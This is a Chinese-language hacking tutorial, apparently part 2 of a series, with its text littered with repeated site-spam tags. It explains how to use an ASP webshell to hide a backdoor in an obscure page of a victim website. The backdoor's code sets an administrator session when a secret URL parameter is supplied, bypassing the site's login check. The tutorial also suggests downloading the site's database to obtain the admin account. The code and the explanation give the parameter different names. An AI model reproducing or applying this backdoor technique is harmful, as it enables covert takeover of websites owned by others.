黑客知识 巧妙配合asp木马取得管理权限(2)
点击次数:24 次 发布日期:2008-11-26 12:32:51 作者:源代码网
|
源代码网推荐 源代码网推荐 session.Timeout=SessionTimeout 源代码网推荐 源代码网推荐 session("AdminName")=rs("username") 源代码网推荐 源代码网推荐 我们在看一下其他管理页面是怎么验证session的,admin_index.asp一开始就这样: 源代码网推荐 源代码网推荐 看起来似乎很严密,但是我们看一下,它这里值验证一个AdminName的session,只要我们的session内容是AdminName的话不就可以通过了?好,我们开工,先去弄到它的管理员账号再说,这个不要我教你了吧?到他网站逛一下或者直接一点下载它的数据库来看都可以知道。我们找个页面来改一下,我找一个比较没人而内容较多的页面FriendSite.asp(友情链接页面)来改,呵呵,这样管理员也很难查得出来啊。用asp木马的编辑功能来编辑一下它的内容。在他页面下隐蔽处加上下面几句话: 源代码网推荐 源代码网推荐 dim id 源代码网推荐 源代码网推荐 id=trim(request("qwe")) 源代码网推荐 源代码网推荐 if id="120" then 源代码网推荐 源代码网推荐 session("AdminName")="admin" ‘这里是假设的,实际操作中可以改成你想要得管理员账号 源代码网推荐 源代码网推荐 end if 源代码网推荐 源代码网推荐 我简单说一下这句话的意思,就是说从地址栏取得hehe的值,如果hehe=120的话,那么系统就给我们一个值为admin的session。好了,我们输入看一下,图二: 源代码网推荐 
源代码网推荐 图二 源代码网推荐 看到有什么异常吗,没有吧?还是正常页面,但是我们接着在地址栏中输入它的后台管理首页看看,是不是进去了?图三: 源代码网推荐 源代码网推荐 
源代码网推荐 图三 源代码网推荐 呵呵,别做坏事哦............ 源代码网推荐 源代码网推荐 小结一下:我们先找到弄到管理员账号,然后找到它的验证页面,根据它的验证内容来写入我们要的后门。不同的系统有不同的验证方式,比如青创文章系统它不但要验证你的用户名还要验证等级,但是我们总体思路还是一样,就是他验证什么我们就加入什么。 源代码网推荐 源代码网推荐 源代码网推荐 源代码网推荐 源代码网推荐 源代码网推荐 源代码网推荐 做人要厚道,请注明转自酷网动力(www.ASPCOOL.COM)。 源代码网推荐 源代码网供稿. |
